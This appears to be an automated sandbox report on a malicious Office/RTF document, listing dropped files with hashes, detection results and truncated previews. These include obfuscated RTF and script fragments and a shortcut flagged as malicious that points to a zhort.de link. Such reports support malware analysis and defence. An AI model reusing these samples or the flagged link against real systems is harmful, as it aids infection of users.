                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):962
                                                                              Entropy (8bit):5.012309356796613
                                                                              Encrypted:false
                                                                              SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                                                                              MD5:14B479958E659C5A4480548A393022AC
                                                                              SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                                                                              SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                                                                              SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                                                                              Malicious:false
                                                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Rich Text Format data, version 1
                                                                              Category:dropped
                                                                              Size (bytes):95554
                                                                              Entropy (8bit):2.4672808402513553
                                                                              Encrypted:false
                                                                              SSDEEP:384:zEDp6mlYSqtsRb8mS+UVfcUlut9OYkFtTVv2BChgc/:zEDp6mqSoY8r7iQu3OYeJeBoN/
                                                                              MD5:F3E730B297901499D743DE5C1DFF1E7D
                                                                              SHA1:B04E1B970316693C05C918B9F087F43FBA243246
                                                                              SHA-256:20863835BFE7B5FBEC9E7AFD08461C711E70AB2BFA9758521744FFE27CE06568
                                                                              SHA-512:801553EF4433D81C074CCFAF8A3C67D868F65AA6709E06730F2C8CF7C23CF4DF264E38E631B239BA853216F8D5987C3F7A469364ACEC5F277B44FBB48CAFCB50
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:{\rtf1.......{\*\wzScriptIdAttr272630091 \[}.{\473008866,)?949=0..?&;??~~4[%/|7@'.4156;).?||:;~%><;|<-72[2!?6.^=+;=1.?53>$%|*!%@]]7%>8#('@.;883?(7`5?0%84?%9?%7~;&38.[0!5`)^%:=?>%`?..2?')1`?+?-?,]9.`&5/]&?])<.?:+=&.`&^.%#8>02*(8.+^0.!)7`.11%1/.9<?%._'0.6.?%.~=%`<($1>_>>$3?')_.%2<=&*^$?~[6'5|~|>.?;,_=..0+(9.!68^;2/???`5?2$]9?@:1=^$/]/`_]|+6^%+9%/.(>5%]=8][?94-272%$:_`~!.=3?###-:?.<+?.1?.?<~2|<.9=%>%`=7?,?8??_|+._=.67.*@].-.3<??.8.747$|...[]3^~2@!&@@%?8_49@^?(8?2?^5.'??2,8#1.[-79@;!;9/'?-:2([-.+|`:8_*#?.*=377&]!4.&9?.?0@5%7%7.3;1*6<.'<#!)@)%5]%^~,07-;>%8._7?!02]?]>.|+&)?87-|%<9.$@.>84,<%[].??&?-.^70?>8&>744|8.8#?;'3||/)415`.;[@30';;;*.(.169=.<`$[/=._@~.??.#??(<6#3(.'?%`~8$$_>)'7-$.94?_*)~]'@9_2=8).1.`(|?#`.<_?450.`3(?.'/.0=#;87????)0*##[.~?.`3,.:<&7#.54!9-/_!([?5-^!#.??=,3|^7/|5?,,74?=_%[?(9,-@;]/.7?*)$(|2;|'.2:?2.31,_%?.!/?._230?660^?*??9??*?*~'^~&.`:(.9#(%_$*#^?1_()>'[']`<:#-%|04,8.;#@:.@[~=.']959#),[%[-7-;5,?=00~)[(2?.3/@0@_?:>63'&.$/.(<,3&+>:&(226!<#2-%.$;!|:[%[!0<@'>+?#%&<./'=?%!/?8=

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\creatednewimagesinpicturebuttersmooth[1].tiff

                                                                              Download File
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):182970
                                                                              Entropy (8bit):3.8053382344283673
                                                                              Encrypted:false
                                                                              SSDEEP:3072:JOEWBwVroEh21gt5pIGw/tS7tKxXnQhp85POf8DyVG:QE3roEh2sUXO85uyyQ
                                                                              MD5:E4D3D857EA66D66052DB0FA95DEC7FEA
                                                                              SHA1:3A16FC72C17FBD808F86FA9F5661A35165CD3B23
                                                                              SHA-256:3DA9CF3BD94658AE0D6C78C441C3146DD1348D7AA8EE084BBAD0B987BC138E46
                                                                              SHA-512:077C4CE61FE80C17E025354BE67916A15423B1A795A0B591D111E0911ED0B5D4BA4C62E770EC130AC48BC5D2D38EE516D312054972FAD4936828A04D019FE00D
                                                                              Malicious:false
                                                                              Preview:......K.c.a.z.A.x.m.x.U.A. .=. .".Q.h.p.j.b.A.b.W.h.K.".....P.i.L.L.P.i.i.A.O.W. .=. .".i.i.C.t.h.B.L.L.W.q.".....i.L.h.U.i.W.z.J.g.k. .=. .".z.h.L.L.U.W.U.q.c.G.".....s.L.K.K.n.x.K.W.r.Z. .=. .".a.h.K.G.O.G.G.Z.O.T.".....A.p.L.i.o.K.o.f.u.h. .=. .".m.K.N.b.R.W.P.L.a.x.".....i.N.W.W.z.a.t.e.N.W. .=. .".P.N.p.n.f.m.Z.l.c.G.".....u.o.a.R.R.G.b.p.i.x. .=. .".W.L.l.W.q.L.c.u.o.c.".........Q.N.q.L.B.n.L.Z.P.e. .=. .".A.e.g.c.N.O.e.d.G.z.".....l.H.e.W.U.x.G.P.l.K. .=. .".L.A.L.f.R.K.c.T.r.i.".....h.m.l.U.W.m.b.L.i.k. .=. .".o.s.G.c.N.c.x.W.c.a.".....b.a.n.a.g.l.y.p.h.a.A.q.u.k.e.G.l. .=. .".K.K.m.L.p.u.f.L.h.P.".....h.W.G.N.W.Z.G.i.d.p. .=. .".a.n.a.g.l.y.p.h.a.q.b.o.f.W.k.K.Z.".....f.A.W.B.c.H.f.m.B.c. .=. .".O.i.n.i.i.f.A.h.e.B.".....K.z.G.L.N.i.u.v.d.p. .=. .".c.U.s.f.L.U.k.l.k.B.".....I.L.z.e.n.K.o.h.L.S. .=. .".a.n.a.g.l.y.p.h.a.a.W.Z.K.L.f.L.k.".....R.z.i.B.k.S.L.b.K.v. .=. .".N.l.B.x.U.k.C.e.W.i.".....m.h.q.k.n.G.b.L.W.q. .=. .".Q.z.L.N.u.j.W.L.o.A.".........G.c.x.L.W.L.K.h.p.K. .=. .

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFA7CAA3.emf

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                              Category:dropped
                                                                              Size (bytes):4527404
                                                                              Entropy (8bit):3.8573411297737294
                                                                              Encrypted:false
                                                                              SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                                              MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                                              SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                                              SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                                              SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                                              Malicious:false
                                                                              Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Rich Text Format data, version 1
                                                                              Category:dropped
                                                                              Size (bytes):95554
                                                                              Entropy (8bit):2.4672808402513553
                                                                              Encrypted:false
                                                                              SSDEEP:384:zEDp6mlYSqtsRb8mS+UVfcUlut9OYkFtTVv2BChgc/:zEDp6mqSoY8r7iQu3OYeJeBoN/
                                                                              MD5:F3E730B297901499D743DE5C1DFF1E7D
                                                                              SHA1:B04E1B970316693C05C918B9F087F43FBA243246
                                                                              SHA-256:20863835BFE7B5FBEC9E7AFD08461C711E70AB2BFA9758521744FFE27CE06568
                                                                              SHA-512:801553EF4433D81C074CCFAF8A3C67D868F65AA6709E06730F2C8CF7C23CF4DF264E38E631B239BA853216F8D5987C3F7A469364ACEC5F277B44FBB48CAFCB50
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:{\rtf1.......{\*\wzScriptIdAttr272630091 \[}.{\473008866,)?949=0..?&;??~~4[%/|7@'.4156;).?||:;~%><;|<-72[2!?6.^=+;=1.?53>$%|*!%@]]7%>8#('@.;883?(7`5?0%84?%9?%7~;&38.[0!5`)^%:=?>%`?..2?')1`?+?-?,]9.`&5/]&?])<.?:+=&.`&^.%#8>02*(8.+^0.!)7`.11%1/.9<?%._'0.6.?%.~=%`<($1>_>>$3?')_.%2<=&*^$?~[6'5|~|>.?;,_=..0+(9.!68^;2/???`5?2$]9?@:1=^$/]/`_]|+6^%+9%/.(>5%]=8][?94-272%$:_`~!.=3?###-:?.<+?.1?.?<~2|<.9=%>%`=7?,?8??_|+._=.67.*@].-.3<??.8.747$|...[]3^~2@!&@@%?8_49@^?(8?2?^5.'??2,8#1.[-79@;!;9/'?-:2([-.+|`:8_*#?.*=377&]!4.&9?.?0@5%7%7.3;1*6<.'<#!)@)%5]%^~,07-;>%8._7?!02]?]>.|+&)?87-|%<9.$@.>84,<%[].??&?-.^70?>8&>744|8.8#?;'3||/)415`.;[@30';;;*.(.169=.<`$[/=._@~.??.#??(<6#3(.'?%`~8$$_>)'7-$.94?_*)~]'@9_2=8).1.`(|?#`.<_?450.`3(?.'/.0=#;87????)0*##[.~?.`3,.:<&7#.54!9-/_!([?5-^!#.??=,3|^7/|5?,,74?=_%[?(9,-@;]/.7?*)$(|2;|'.2:?2.31,_%?.!/?._230?660^?*??9??*?*~'^~&.`:(.9#(%_$*#^?1_()>'[']`<:#-%|04,8.;#@:.@[~=.']959#),[%[-7-;5,?=00~)[(2?.3/@0@_?:>63'&.$/.(<,3&+>:&(226!<#2-%.$;!|:[%[!0<@'>+?#%&<./'=?%!/?8=

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):3.0243837993729854
                                                                              Encrypted:false
                                                                              SSDEEP:96:9w9mMPURep0/jUMkXw9PzgfpBU8MPn9U0/jUMkXw9PzgfpBU:KFPcxkA9gWPpxkA9g
                                                                              MD5:38AD10D5C37EF04986F4F3D30E08E02E
                                                                              SHA1:3AA2FAF93963BB9C85E32556477AE7A19B6EAF0B
                                                                              SHA-256:B5F152E264847DCADF6FA55E957AA0D520073EBE7FA9E015BD97094851DF341C
                                                                              SHA-512:C44A787DE5CE8AEF2AA8D2F4DC6C0B04A655635A2B43994D9A95DA637EAC8277FCFB2BE3826D9254BA42AC6F63A8862064B0518B7A66396357E94FBD0BECBB47
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3BC29406-A787-4DAC-A6BC-E886A20E49F0}.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7680
                                                                              Entropy (8bit):3.4624132735284183
                                                                              Encrypted:false
                                                                              SSDEEP:192:zUgNXrNFg3qkuwwdTa1zN3BLoltNbkLJ+Cjx74PHG6:V7Xg3qZwwxaT3SJkLJR74PHG6
                                                                              MD5:F0EFB5612CCDE4E57F81C95E6E60F960
                                                                              SHA1:A3D22A5E1DD2D2F8A3C1A69A346A8754FF1E0381
                                                                              SHA-256:410030561E26E83CA33DA83D6C7F2CE4F792104AAC4DB2C32581252D636BA3B4
                                                                              SHA-512:721787659BCF33B568F9C8509372D31B483037E692F2B6CB983966FE9F7F5D83CEB5457C1829354F284BA91BF873DD2505F8EC40602C94E2FFB07A52A82C726B
                                                                              Malicious:false
                                                                              Preview:......7.3.0.0.8.8.6.6.,.).?.9.4.9.=.0.....?.&.;.?.?.~.~.4.[.%./.|.7.@.'...4.1.5.6.;.)...?.|.|.:.;.~.%.>.<.;.|.<.-.7.2.[.2.!.?.6...^.=.+.;.=.1...?.5.3.>.$.%.|.*.!.%.@.].].7.%.>.8.#.(.'.@...;.8.8.3.?.(.7.`.5.?.0.%.8.4.?.%.9.?.%.7.~.;.&.3.8...[.0.!.5.`.).^.%.:.=.?.>.%.`.?.....2.?.'.).1.`.?.+.?.-.?.,.].9...`.&.5./.].&.?.].).<...?.:.+.=.&...`.&.^...%.#.8.>.0.2.*.(.8...+.^.0...!.).7.`...1.1.%.1./...9.<.?.%..._.'.0...6...?.%...~.=.%.`.<.(.$.1.>._.>.>.$.3.?.'.)._...%.2.<.=.&.*.^.$.?.~.[.6.'.5.|.~.|.>...?.;.,._.=.....0.+.(.9...!.6.8.^.;.2./.?.?.?.`.5.?.2.$.].9.?.@.:.1.=.^.$./.]./.`._.].|.+.6.^.%.+.9.%./...(.>.5.%.].=.8.].[.?.9.4.-.2.7.2.%.$.:._.`.~.!...=.3.?.#.#.#.-.:.?...<.+.?...1.?...?.<.~.2.|.<...9.=.%.>.%.`.=.7.?.,.?.8.?.?._.|.+..._.=...6.7...*.@.]...-...3.<.?.?...8...7.4.7.$.|.......[.].3.^.~.2.@.!.&.@.@.%.?.8._.4.9.@.^.?.(.8.?.2.?.^.5...'.?.?.2.,.8.#.1...[.-.7.9.@.;.!.;.9./.'.?.-.:.2.(.[.-...+.|.`.:.8._.*.#.?...*.=.3.7.7.&.].!.4...&.9.?...?.0.@.5.%.7.%.7...3.;.1.*.6.<...'.<.#.!.).@.).%.5.

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F8AF6A03-11BE-47AE-A42D-097B99D01F40}.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1024
                                                                              Entropy (8bit):0.05390218305374581
                                                                              Encrypted:false
                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                              Malicious:false
                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\3pxfqgdj.nvw.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1

                                                                              C:\Users\user\AppData\Local\Temp\bhvA42C.tmp

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x24941a1f, page size 32768, DirtyShutdown, Windows version 6.1
                                                                              Category:dropped
                                                                              Size (bytes):21037056
                                                                              Entropy (8bit):1.1390578260694992
                                                                              Encrypted:false
                                                                              SSDEEP:24576:vO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:vOEXs1LuHqqEXwPW+RHA6m1fN
                                                                              MD5:3E06F4A5AABEFEDD5DFF156727F8B2A5
                                                                              SHA1:B919EDB704B0582DEDFE2EB075E526A4D1938F90
                                                                              SHA-256:F5884086989F5AE62121CD0CD98BC6E455652A3C67C77E029D005F72BFD66FB5
                                                                              SHA-512:15713BB08820DC96424B86ED6B11033151A8C28D32D49C10826A1B4ECD22A0F8D3087DB4F44DB9D7890E4E710DFA2C6A0598844AB547DE25B960F17011465E9F
                                                                              Malicious:false
                                                                              Preview:$...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\bu5kktkw.mxa.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1

                                                                              C:\Users\user\AppData\Local\Temp\bxivncg

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Preview:..

                                                                              C:\Users\user\AppData\Local\Temp\nu2uxh4f.bgh.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1

                                                                              C:\Users\user\AppData\Local\Temp\z4z03ydu.kcd.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1

                                                                              C:\Users\user\AppData\Local\Temp\{566CF4B8-703E-496C-9E68-CF8D27E74A2C}

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025614997046743235
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPcqVGu1HvxggLRhJarvLods/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPpVfRVOLodyvYg3J/
                                                                              MD5:A7F9B7669680B4F3BA36FA307C3EE266
                                                                              SHA1:747309F4C224F46B0404BD9AEE2343F35E5E6310
                                                                              SHA-256:800AB282135663481B06A86016FB2FF44293FAE5C1F3DA4C9854947812344A3A
                                                                              SHA-512:4625C3B54046DE23DF71838E0535A91263F21044B2056CC0067A3DB8898405B725DABFA1B84AD52FE332C3DE1F6A31DA92398F891FFF1FDAAE4A2B24EE18849D
                                                                              Malicious:false
                                                                              Preview:......M.eFy...z.r..m,.M...P=.. S,...X.F...Fa.q..............................<}.,-B..`.y.............^.y.J....:.QW.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\{FF1FD208-1DF0-42A7-BA3B-F756B58327B1}

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025638993377216
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPctBGJ1HvxggLRT1RRXv//4tfnRujlw//+GtluJ/eRuj:I3DPDbn1/vYg3J/
                                                                              MD5:F0A8AC75D2ADB381C4450A2293BA91E1
                                                                              SHA1:16827BE124B95EAD420928A7DB4996511A8A2FB0
                                                                              SHA-256:2D6D70CD93309720678F4DF151126701A61F1DC3619E2645969136EAB6B49804
                                                                              SHA-512:3D6F17910334F855294FF853FB266870C0CE59E6F0072C329DABFD44A817DC669FE52E3527CA633FB4684ABE1C848352EDC93C2FA52239092BEFF5A2BEF7D0F2
                                                                              Malicious:false
                                                                              Preview:......M.eFy...z.la.YD.K.d....S,...X.F...Fa.q............................!..}=..A.k@3..............N.;KE.....cB......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\~DF12645870096F092E.TMP

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):1.0068952632782686
                                                                              Encrypted:false
                                                                              SSDEEP:48:FackRPhSGESOVoy9CANFUVkerPFvOlTAfBYcx/r/gu3KI2iBL+/WW:FIRYIOiAUdrFWlTAfBYcZjN3KI2iNuWW
                                                                              MD5:E7D49F8A981E6273F05D54206C3F567D
                                                                              SHA1:F1D3CC6144B8B7BE7B0A732FBFFC5062B46540B5
                                                                              SHA-256:D7E66F9F197FB2ACA55881A3ECD9DFCF93AC33AB620B6F11348D37AB45377101
                                                                              SHA-512:D82AD01071D1D852F36035D0E38679F28264D08185864BDEB02FAD1E5A35106E27ABE50DEAF30BD7ED5F38E9F3E6B06C20006F49AD3A5BD2C526B280E004EA76
                                                                              Malicious:false
                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\~DFD6364EFA86619002.TMP

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):512
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3::
                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                              Malicious:false
                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\UlEYs1.url

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/UlEYs1>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):49
                                                                              Entropy (8bit):4.580607099971186
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm2fzrzm:HRYFVm4K
                                                                              MD5:A5338305A71A43B33F18CB8DC22C9F66
                                                                              SHA1:BB884B3A0469DDF26B767B0A849E13709DEF2E4D
                                                                              SHA-256:8AAC00BD8C3F733776EB0F94F4662A8BE42BADEF2269DA110E85CB409DFC4DCE
                                                                              SHA-512:88438664BFBF30194A9411D55231C9E1B673358CFF7838F187C0EDDD4E126B88FF6E81A3A6EFB3A8F9928D535678F4AC84A35B8A8C22A148C7AC1156A2E54967
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=https://zhort.de/UlEYs1..

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):41
                                                                              Entropy (8bit):4.277926089825635
                                                                              Encrypted:false
                                                                              SSDEEP:3:bD1jZ4jt2kZ1:bFZ45xb
                                                                              MD5:DA23383A40825BA4FB308760FA177037
